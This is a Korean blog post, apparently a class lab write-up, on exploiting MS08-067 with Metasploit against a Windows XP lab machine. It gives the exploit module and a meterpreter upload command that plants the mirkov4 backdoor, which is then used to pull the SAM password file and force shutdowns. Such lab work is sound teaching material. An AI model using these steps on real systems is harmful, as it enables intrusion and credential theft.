[+] mirkov4 Backdoor metasploit

MS08-067 netapi 취약점을 이용하여 침투한뒤 수업중에 소개된 사랑의 mirkov4 백도어를 심는 테스트를 진행하였습니다.

*--- 테스트 환경 ---*

공격자 : 192.168.163.132 (OS : BackTrack5 R3)

피해자 : 192.168.163.152 (OS : Windows XP SP1)

백트랙에서 msf 실행을 합니다. 그리고 search netapi exploit 를 검색합니다.

MS08-067 netapi 취약점은 MS 윈도우 서버 서비들은 파일이나 프린트의 서비스의 공유를 지원한다고 합니다.

이 서비스에서 원격 실행 코드에 취약하다는것이 발견되었습니다.

예를 들어 서버의 서비스 구성 요소에 특수한 경로로 조작된 RPC 요청으로 인해 스택 메모리에 손상을 준다.

netapi32,dll 의 NetprPathCanonicalize() 영향을 받는다.

netapi32.dll 파일에서 비롯된 취약점이라 이름이 MS08-067_NetAPI 라고 합니다. (출처 : blog.naver.com/s2kiess 우동님 홈피)

피해자 환경입니다.

첫번째 실습사진에서 검색한 MS08-067 부분을 드래그 후 복사하여 use exploit/windows/smb/ms08-067_netapi 명령어 입력.

그 후 희생자의 IP 주소입력 후 Exploit 코드를 실행합니다. 실행 후 공격자의 OS 와 세션 연결이 되며

희생자의 OS 정보가 나오며 공격은 성공을 하게 되었습니다.

pwd 명령어로 현재 위치를 확인하고 실습하기 편한 C:\ 폴더로 이동을 합니다. 

(클릭하면 이미지 커집니다.)

공격자의 OS 에 설치되어 있는 mirkov4 파일을 희생자의 C:\ 폴더로 업로드 시킵니다. 

백트랙의 /pentest/windows-binaries/misc/ 폴더안에 있습니다. 

meterpreter > upload /pentest/windows-binaries/misc/mirkov4-1.1/mirkov4.exe c:

실행을 하면 사진과 같이 업로드가 성공이 되었다고 나옵니다. 

희생자의 C:\ 에 가보면 사랑의 mirkov4 가 잘있습니다. 

희생자의 컴을 장악한 공격자의 화면에서도 파일을 확인하면 mirkov4.exe 파일이 잘 업로드 된걸 확인 할 수 있습니다.

이제 mirkov4 를 실행을 하면 됩니다. 

mirkov4.exe 명령어만 실행을 해도 되며 본인이 설정하고자 하는 포트 번호를 붙여 실행을 해도 됩니다. 

그 후 인터넷 창을 열어 http://192.168.163.152:1221 실행을 합니다. (포트번호를 지정안해주고 했을시에는 디폴트 포트로 함)

IP 앞에 꼭 http:// 붙여줘야 실행이 됩니다. 

윈도우 password 파일인 sam 파일을 다운받을수도 있으며 ..

희생자의 컴을 강제로 셧다운 시킬수도 있습니다.